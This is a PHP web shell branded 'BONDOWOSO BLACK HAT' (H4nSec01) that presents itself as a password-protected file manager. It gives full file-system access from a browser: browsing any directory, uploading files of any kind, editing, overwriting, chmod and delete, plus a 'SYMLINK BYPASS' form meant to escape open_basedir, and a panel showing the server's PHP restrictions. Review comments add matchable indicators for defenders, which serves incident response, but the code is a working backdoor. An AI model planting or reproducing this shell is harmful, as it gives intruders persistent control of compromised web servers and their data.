<?php
// ============================================================
// PHP FILE MANAGER - GTA
// BONDOWOSO BLACK HAT
// AUTHOR : H4nSec01
// ============================================================
// Start or resume the session; the login flag tested below is stored in $_SESSION['fm_auth'].
session_start();
// ---------- CONFIGURATION ----------
// NOTE(review): one shared password, kept in cleartext in the file. This literal and the
// banner strings in the login page below are fixed text that responders can match on when
// searching a host or its backups for copies of this file.
$auth_password = 'H4nSec01'; // CHANGE THIS
// Default timezone for the date() call that formats modification times in the listing.
$timezone = 'America/Los_Angeles';
date_default_timezone_set($timezone);
// ---------- AUTH ----------
// Gate for everything that follows: unless the session already holds fm_auth === true,
// the request must carry a POST field `password`.
if (!isset($_SESSION['fm_auth']) || $_SESSION['fm_auth'] !== true) {
// Strict (===) string comparison with the configured password; success only sets the session flag.
if (isset($_POST['password']) && $_POST['password'] === $auth_password) {
$_SESSION['fm_auth'] = true;
} else {
// Every other request receives the login form and the script stops at exit.
// The form is a single string literal; its stylesheet imports a font from fonts.googleapis.com,
// which is fetched by the visiting browser, not by the server.
// No failed-attempt counter, delay or logging is present in this block.
echo '<!DOCTYPE html><html><head><title>H4nSec01 - FM</title><style>
@import url("https://fonts.googleapis.com/css2?family=Black+Ops+One&display=swap");
body{background:#000;display:flex;justify-content:center;align-items:center;height:100vh;font-family:"Black Ops One","Pricedown",Impact,"Arial Black",sans-serif;}
.login-box{background:#111;padding:30px;border:3px solid #ff3300;box-shadow:0 0 30px rgba(255,51,0,0.6);width:320px;text-align:center;}
h2{color:#ff3300;font-size:28px;letter-spacing:2px;text-shadow:2px 2px 0 #660000;margin-bottom:20px;}
input,button{width:100%;padding:12px;margin:10px 0;background:#222;border:2px solid #ff3300;color:#fff;font-family:monospace;font-size:16px;}
button{background:#ff3300;color:#000;font-weight:bold;border:none;cursor:pointer;font-family:"Black Ops One",Impact;}
button:hover{background:#ff5500;}</style></head><body>
<div class="login-box"><h2>H4nSec01 - BondowosoBlackHat</h2><form method="post"><input type="password" name="password" placeholder="ENTER PASSWORD" autofocus><button type="submit">ACCESS</button></form></div>
</body></html>';
exit;
}
}
// ---------- FUNCTIONS ----------
/**
 * Render a byte count as a short human-readable string.
 *
 * Uses binary units (1 KB = 1024 B). Values of 1 KB and above are divided by the
 * largest unit that fits and rounded to two decimals; smaller values are printed
 * unchanged with a " B" suffix.
 *
 * @param int|float $bytes Size in bytes.
 * @return string e.g. "500 B", "1.5 KB", "5 MB".
 */
function format_bytes($bytes) {
    // Ordered largest first so the first threshold that fits wins.
    $units = array(
        'GB' => 1073741824,
        'MB' => 1048576,
        'KB' => 1024,
    );
    foreach ($units as $label => $divisor) {
        if ($bytes >= $divisor) {
            return round($bytes / $divisor, 2) . ' ' . $label;
        }
    }
    return $bytes . ' B';
}
/**
 * Convert a numeric file mode (as returned by fileperms()) into an ls-style string.
 *
 * The first character is the file type: 's' socket, 'l' symlink, '-' regular file,
 * 'd' directory, 'u' for anything else. Nine characters follow for owner, group and
 * other; setuid/setgid appear as 's'/'S' and the sticky bit as 't'/'T' in the
 * execute position (lower case when the execute bit is also set).
 *
 * @param int $perms Mode bits.
 * @return string Ten-character permission string, e.g. "-rw-r--r--".
 */
function get_perm_string($perms) {
    // File-type masks, tested in this order; the first full match decides the type letter.
    $type_masks = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x4000 => 'd',
    );
    $out = 'u';
    foreach ($type_masks as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $out = $letter;
            break;
        }
    }

    // One row per class: read bit, write bit, execute bit, special bit,
    // letter when special+execute are set, letter when only special is set.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $row) {
        list($read, $write, $exec, $special, $with_exec, $without_exec) = $row;
        $out .= ($perms & $read) ? 'r' : '-';
        $out .= ($perms & $write) ? 'w' : '-';
        if ($perms & $exec) {
            $out .= ($perms & $special) ? $with_exec : 'x';
        } else {
            $out .= ($perms & $special) ? $without_exec : '-';
        }
    }
    return $out;
}
// Get current directory
// Resolve the working directory for this request. Order of preference:
// the ?dir= query parameter, then the directory remembered in the session,
// then DOCUMENT_ROOT (or this script's own directory when that is unset).
// NOTE(review): no base directory or allow-list is enforced here. Any directory the PHP
// process can resolve is accepted, so the reachable scope is bounded only by file-system
// permissions and server-side settings such as open_basedir.
$current_dir = '/';
if (isset($_GET['dir']) && !empty($_GET['dir'])) {
$input_dir = $_GET['dir'];
// NUL bytes are stripped from the request value before it reaches the path functions.
$input_dir = str_replace("\0", '', $input_dir);
// @ hides the warning realpath() can raise; failure is detected via the false return.
$real = @realpath($input_dir);
if ($real !== false && is_dir($real)) {
// Canonical path found: normalise to exactly one trailing slash and remember it.
$current_dir = rtrim($real, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
} elseif (is_dir($input_dir)) {
// realpath() failed but is_dir() accepts the raw value: it is used un-canonicalised.
$current_dir = rtrim($input_dir, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
} elseif (isset($_SESSION['last_dir'])) {
// Requested path is not a directory: stay where the session last was.
$current_dir = $_SESSION['last_dir'];
} else {
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
} elseif (isset($_SESSION['last_dir'])) {
// No ?dir= given: reuse the remembered directory.
$current_dir = $_SESSION['last_dir'];
} else {
// First visit with no parameter: start at the web root.
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
// Handle POST actions
// Status and error text for the banner rendered by the HTML part of this file.
$message = '';
$error = '';
// Dispatcher for state-changing requests. The POST field `action` selects one branch;
// the accepted values are fixed strings (upload, rename, chmod, edit_save, mkdir, touch,
// delete, go_path, create_symlink), so they are matchable wherever request bodies are
// captured (WAF, reverse proxy, application logging).
// NOTE(review): no anti-CSRF token is checked; the session flag is the only control.
// NOTE(review): every branch runs with the privileges of the PHP/web-server account,
// so files created or changed here will carry that account's ownership and fresh mtimes.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
// upload: the client-supplied file name is reduced with basename() and the file is moved
// into $current_dir. No check of extension, content type or size is made in this branch.
if ($action === 'upload' && isset($_FILES['upload_file'])) {
$dest = $current_dir . basename($_FILES['upload_file']['name']);
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $dest)) {
$message = "Uploaded: " . htmlspecialchars(basename($_FILES['upload_file']['name']));
} else {
$error = "Upload failed.";
}
}
// rename: both names are appended to $current_dir as received. Unlike upload/mkdir/touch,
// basename() is not applied, so directory components in either value are kept.
elseif ($action === 'rename' && !empty($_POST['target']) && !empty($_POST['new_name'])) {
$old = $current_dir . $_POST['target'];
$new = $current_dir . $_POST['new_name'];
if (file_exists($old) && rename($old, $new)) {
$message = "Renamed: {$_POST['target']} -> {$_POST['new_name']}";
} else {
$error = "Rename failed.";
}
}
// chmod: the `perms` text is parsed as base-8 and applied to $current_dir . chmod_target
// (no basename()); @ suppresses the warning chmod() raises on failure.
elseif ($action === 'chmod' && !empty($_POST['chmod_target']) && !empty($_POST['perms'])) {
$path = $current_dir . $_POST['chmod_target'];
$octal = intval($_POST['perms'], 8);
if (@chmod($path, $octal)) {
$message = "Chmod {$_POST['perms']} applied to {$_POST['chmod_target']}";
} else {
$error = "Chmod failed.";
}
}
// edit_save: writes the posted `content` verbatim to $current_dir . target, replacing
// whatever the file held. No basename() and no restriction on file type.
elseif ($action === 'edit_save' && !empty($_POST['target']) && isset($_POST['content'])) {
$path = $current_dir . $_POST['target'];
if (file_put_contents($path, $_POST['content']) !== false) {
$message = "Saved: {$_POST['target']}";
} else {
$error = "Save failed.";
}
}
// mkdir: basename() of the requested name, created with mode 0755 only if nothing
// exists at that path yet.
elseif ($action === 'mkdir' && !empty($_POST['new_folder'])) {
$path = $current_dir . basename($_POST['new_folder']);
if (!file_exists($path)) {
if (@mkdir($path, 0755)) {
$message = "Folder created: " . basename($_POST['new_folder']);
} else {
$error = "Cannot create folder.";
}
} else {
$error = "Folder exists.";
}
}
// touch: creates an empty file named basename(new_file); refuses to overwrite.
elseif ($action === 'touch' && !empty($_POST['new_file'])) {
$path = $current_dir . basename($_POST['new_file']);
if (!file_exists($path)) {
if (file_put_contents($path, '') !== false) {
$message = "File created: " . basename($_POST['new_file']);
} else {
$error = "Cannot create file.";
}
} else {
$error = "File exists.";
}
}
// delete: unlink() for files; directories are removed only when glob('<dir>/*') is empty.
// The target is appended without basename(). The '/*' pattern does not match dot-files,
// so a folder holding only hidden entries passes the emptiness test and rmdir() then fails.
elseif ($action === 'delete' && !empty($_POST['target'])) {
$path = $current_dir . $_POST['target'];
if (is_file($path)) {
if (@unlink($path)) $message = "Deleted file: {$_POST['target']}";
else $error = "Delete failed.";
} elseif (is_dir($path)) {
if (count(glob($path . '/*')) === 0) {
if (@rmdir($path)) $message = "Deleted empty folder: {$_POST['target']}";
else $error = "Cannot delete folder.";
} else {
$error = "Folder not empty.";
}
}
}
// go_path: changes the working directory from a typed path, using the same acceptance
// logic as the ?dir= handling (NUL strip, realpath(), is_dir()), then redirects to ?dir=
// so the new location ends up in the query string.
elseif ($action === 'go_path' && !empty($_POST['manual_path'])) {
$new_path = $_POST['manual_path'];
$new_path = str_replace("\0", '', $new_path);
$real = @realpath($new_path);
if ($real !== false && is_dir($real)) {
$current_dir = rtrim($real, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
header("Location: ?dir=" . urlencode($current_dir));
exit;
} elseif (is_dir($new_path)) {
$current_dir = rtrim($new_path, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
header("Location: ?dir=" . urlencode($current_dir));
exit;
} else {
$error = "Invalid directory: " . htmlspecialchars($new_path);
}
}
// create_symlink: the link target is taken from the request unchanged; only the link
// name is reduced with basename() and placed in $current_dir. The page labels this form
// "SYMLINK BYPASS" and also prints the open_basedir setting.
// NOTE(review): for defenders, symlinks under the web root that are owned by the web-server
// account and point outside it are an artifact to look for; listing symlink in
// disable_functions and not following symlinks when serving files both constrain this.
elseif ($action === 'create_symlink' && !empty($_POST['target_path']) && !empty($_POST['link_name'])) {
$target = $_POST['target_path'];
$link_name = $current_dir . basename($_POST['link_name']);
if (function_exists('symlink')) {
if (@symlink($target, $link_name)) {
$message = "Symlink created: " . basename($_POST['link_name']) . " -> $target";
} else {
$error = "Symlink creation failed.";
}
} else {
$error = "symlink() disabled.";
}
}
}
// Refresh
// Re-read the working directory from the session after the POST handlers ran; if it is
// no longer a directory, fall back to DOCUMENT_ROOT (or this script's directory).
if (isset($_SESSION['last_dir'])) {
$current_dir = $_SESSION['last_dir'];
if (!is_dir($current_dir)) {
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
}
// Read directory
// scandir() warnings are suppressed with @; an unreadable directory yields an error
// banner and an empty listing instead.
$items = @scandir($current_dir);
if ($items === false) {
$error = "Cannot read directory: " . htmlspecialchars($current_dir);
$items = [];
}
// Split entries into directories and everything else, skipping '.' and '..'.
$dirs = [];
$files = [];
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$full = $current_dir . $item;
if (is_dir($full)) $dirs[] = $item;
else $files[] = $item;
}
// Natural, case-insensitive order; directories are listed before files.
sort($dirs, SORT_NATURAL | SORT_FLAG_CASE);
sort($files, SORT_NATURAL | SORT_FLAG_CASE);
$all_items = array_merge($dirs, $files);
// ?edit= selects a file in the current directory (basename() drops any path part);
// its contents are read in full and HTML-escaped for display in the editor textarea.
$edit_file = isset($_GET['edit']) ? basename($_GET['edit']) : '';
$edit_content = '';
if ($edit_file && file_exists($current_dir . $edit_file) && is_file($current_dir . $edit_file)) {
$edit_content = htmlspecialchars(file_get_contents($current_dir . $edit_file));
}
// Values shown in the page's "SERVER INFO" panel: the open_basedir and disable_functions
// settings, whether the current directory is writable, and whether symlink() is usable.
// NOTE(review): this exposes the host's PHP restrictions to whoever is logged in.
$open_basedir = ini_get('open_basedir');
$disable_functions = ini_get('disable_functions');
$is_writable = is_writable($current_dir) ? 'YES' : 'NO';
// The disable_functions list is split on ',' without trimming and compared loosely, so an
// entry written with surrounding spaces would not match here - TODO confirm against the host's php.ini.
$symlink_available = function_exists('symlink') && !in_array('symlink', explode(',', $disable_functions));
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>GTA FILE MANAGER</title>
<style>
@import url("https://fonts.googleapis.com/css2?family=Black+Ops+One&display=swap");
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background: #000;
font-family: 'Black Ops One', 'Pricedown', Impact, 'Arial Black', sans-serif;
padding: 20px;
color: #fff;
}
.container {
max-width: 1400px;
margin: 0 auto;
background: #0a0a0a;
border: 3px solid #ff3300;
box-shadow: 0 0 30px rgba(255,51,0,0.5);
}
.header {
background: #ff3300;
padding: 20px 30px;
text-align: center;
}
.header h1 {
font-size: 3rem;
letter-spacing: 4px;
color: #000;
text-shadow: 3px 3px 0 #660000;
font-family: 'Black Ops One', Impact;
}
.path-bar {
background: #111;
padding: 12px 25px;
border-bottom: 2px solid #ff3300;
display: flex;
flex-wrap: wrap;
justify-content: space-between;
align-items: center;
}
.path {
background: #1a1a1a;
padding: 6px 15px;
font-family: monospace;
color: #ff884d;
border-left: 4px solid #ff3300;
}
.writable {
background: #ff3300;
color: #000;
padding: 4px 12px;
font-weight: bold;
}
.manual-nav {
background: #0a0a0a;
padding: 12px 25px;
border-bottom: 2px solid #ff3300;
display: flex;
flex-wrap: wrap;
gap: 10px;
align-items: center;
}
.manual-nav form {
display: flex;
flex: 1;
gap: 10px;
}
.manual-nav input {
flex: 3;
padding: 8px 12px;
background: #222;
border: 2px solid #ff3300;
color: #fff;
font-family: monospace;
}
button, .nav-btn {
background: #ff3300;
color: #000;
border: none;
padding: 8px 20px;
font-weight: bold;
cursor: pointer;
font-family: 'Black Ops One', Impact;
text-decoration: none;
display: inline-block;
}
button:hover, .nav-btn:hover {
background: #ff5500;
}
.two-columns {
display: flex;
flex-wrap: wrap;
}
.sidebar {
width: 300px;
background: #0a0a0a;
border-right: 2px solid #ff3300;
padding: 20px;
}
.main-content {
flex: 1;
padding: 20px;
overflow-x: auto;
}
.action-card {
background: #111;
border: 2px solid #ff3300;
margin-bottom: 20px;
padding: 15px;
}
.action-card h3 {
color: #ff3300;
border-left: 4px solid #ff3300;
padding-left: 10px;
margin-bottom: 12px;
font-size: 1.2rem;
}
.form-group {
margin-bottom: 10px;
display: flex;
flex-wrap: wrap;
gap: 8px;
}
input, select, textarea {
background: #222;
border: 1px solid #ff3300;
color: #fff;
padding: 8px;
font-family: monospace;
}
table {
width: 100%;
border-collapse: collapse;
}
th, td {
text-align: left;
padding: 10px 8px;
border-bottom: 1px solid #ff3300;
}
th {
background: #1a1a1a;
color: #ff884d;
font-family: 'Black Ops One', Impact;
letter-spacing: 1px;
}
tr:hover {
background: #1a0a0a;
}
.folder-link {
color: #ff884d;
text-decoration: none;
font-weight: bold;
}
.folder-link:hover {
color: #ff3300;
}
.actions form {
display: inline;
}
.small-btn {
background: #333;
color: #fff;
padding: 4px 8px;
font-size: 0.7rem;
margin: 0 2px;
border: 1px solid #ff3300;
font-family: monospace;
}
.message {
background: #1e3a1e;
color: #0f0;
padding: 10px 20px;
margin: 10px 20px;
border-left: 4px solid #0f0;
}
.error {
background: #3a1e1e;
color: #ff6666;
border-left-color: #f00;
}
.server-info {
background: #111;
border: 1px solid #ff3300;
padding: 10px;
font-size: 0.7rem;
font-family: monospace;
margin-top: 20px;
}
.footer {
text-align: center;
padding: 15px;
border-top: 2px solid #ff3300;
font-size: 0.7rem;
font-family: monospace;
}
@media (max-width: 800px) {
.sidebar { width: 100%; border-right: none; border-bottom: 2px solid #ff3300; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>H4nSec01 - BondowosoBlackHat FM</h1>
</div>
<div class="path-bar">
<div class="path">CURRENT: <?php echo htmlspecialchars($current_dir); ?></div>
<div class="writable">WRITABLE: <?php echo $is_writable; ?></div>
</div>
<div class="manual-nav">
<strong style="color:#ff3300;">JUMP:</strong>
<form method="post">
<input type="hidden" name="action" value="go_path">
<input type="text" name="manual_path" value="<?php echo htmlspecialchars($current_dir); ?>">
<button type="submit">GO</button>
</form>
<a href="?dir=<?php echo urlencode(dirname(rtrim($current_dir,'/'))); ?>" class="nav-btn">PARENT</a>
<a href="?" class="nav-btn">RESET</a>
</div>
<?php if ($message): ?><div class="message"><?php echo htmlspecialchars($message); ?></div><?php endif; ?>
<?php if ($error): ?><div class="message error"><?php echo htmlspecialchars($error); ?></div><?php endif; ?>
<div class="two-columns">
<div class="sidebar">
<div class="action-card">
<h3>UPLOAD</h3>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="file" name="upload_file" required>
<button type="submit">UPLOAD</button>
</form>
</div>
<div class="action-card">
<h3>CREATE FOLDER</h3>
<form method="post">
<input type="hidden" name="action" value="mkdir">
<input type="text" name="new_folder" placeholder="folder_name" required>
<button type="submit">CREATE</button>
</form>
</div>
<div class="action-card">
<h3>CREATE FILE</h3>
<form method="post">
<input type="hidden" name="action" value="touch">
<input type="text" name="new_file" placeholder="file.txt" required>
<button type="submit">CREATE</button>
</form>
</div>
<div class="action-card">
<h3>RENAME</h3>
<form method="post">
<input type="hidden" name="action" value="rename">
<input type="text" name="target" placeholder="current name" required>
<input type="text" name="new_name" placeholder="new name" required>
<button type="submit">RENAME</button>
</form>
</div>
<div class="action-card">
<h3>CHMOD (octal)</h3>
<form method="post">
<input type="hidden" name="action" value="chmod">
<input type="text" name="chmod_target" placeholder="file/folder name" required>
<input type="text" name="perms" placeholder="0755 or 0644" required>
<button type="submit">CHMOD</button>
</form>
</div>
<div class="action-card">
<h3>SYMLINK BYPASS</h3>
<form method="post">
<input type="hidden" name="action" value="create_symlink">
<input type="text" name="target_path" placeholder="Target absolute path" required>
<input type="text" name="link_name" placeholder="Link name (in current dir)" required>
<button type="submit">CREATE SYMLINK</button>
</form>
<div style="font-size:0.7rem; color:#ff884d; margin-top:8px;">
Symlink: <?php echo $symlink_available ? 'ENABLED' : 'DISABLED'; ?>
</div>
</div>
<div class="server-info">
<strong>SERVER INFO</strong><br>
PHP: <?php echo phpversion(); ?><br>
open_basedir: <?php echo htmlspecialchars($open_basedir ?: 'NOT SET'); ?><br>
disable_functions: <?php echo htmlspecialchars($disable_functions ?: 'none'); ?>
</div>
</div>
<div class="main-content">
<table>
<thead><tr><th>NAME</th><th>SIZE</th><th>PERMS</th><th>MODIFIED</th><th>ACTIONS</th></tr></thead>
<tbody>
<?php foreach ($all_items as $item):
$full = $current_dir . $item;
$is_dir = is_dir($full);
$perms = substr(sprintf('%o', fileperms($full)), -4);
$perm_str = get_perm_string(fileperms($full));
$size = $is_dir ? '-' : format_bytes(filesize($full));
$mtime = date('Y-m-d H:i:s', filemtime($full));
?>
<tr>
<td>
<?php if ($is_dir): ?>
<a href="?dir=<?php echo urlencode($full); ?>" class="folder-link">📁 <?php echo htmlspecialchars($item); ?></a>
<?php else: ?>
📄 <?php echo htmlspecialchars($item); ?>
<?php endif; ?>
</td>
<td><?php echo $size; ?></td>
<td><?php echo $perms . ' (' . $perm_str . ')'; ?></td>
<td><?php echo $mtime; ?></td>
<td class="actions">
<?php if (!$is_dir): ?>
<a href="?edit=<?php echo urlencode($item); ?>&dir=<?php echo urlencode($current_dir); ?>"><button type="button" class="small-btn">EDIT</button></a>
<?php endif; ?>
<form method="post" style="display:inline;" onsubmit="return confirm('DELETE <?php echo htmlspecialchars($item); ?> ?');">
<input type="hidden" name="action" value="delete">
<input type="hidden" name="target" value="<?php echo htmlspecialchars($item); ?>">
<button type="submit" class="small-btn">DEL</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php if ($edit_file): ?>
<div style="margin-top:30px; background:#111; border:2px solid #ff3300; padding:20px;">
<h3 style="color:#ff3300;">EDITING: <?php echo htmlspecialchars($edit_file); ?></h3>
<form method="post">
<input type="hidden" name="action" value="edit_save">
<input type="hidden" name="target" value="<?php echo htmlspecialchars($edit_file); ?>">
<textarea name="content" rows="15" style="width:100%; background:#222; color:#fff; border:1px solid #ff3300;"><?php echo $edit_content; ?></textarea>
<div style="margin-top:10px;">
<button type="submit">SAVE</button>
<a href="?dir=<?php echo urlencode($current_dir); ?>" class="nav-btn" style="background:#333;">CANCEL</a>
</div>
</form>
</div>
<?php endif; ?>
</div>
</div>
<div class="footer">
BONDOWOSO BLACK HAT FILE MANAGER // H4nSec01 - 2023
</div>
</div>
</body>
</html>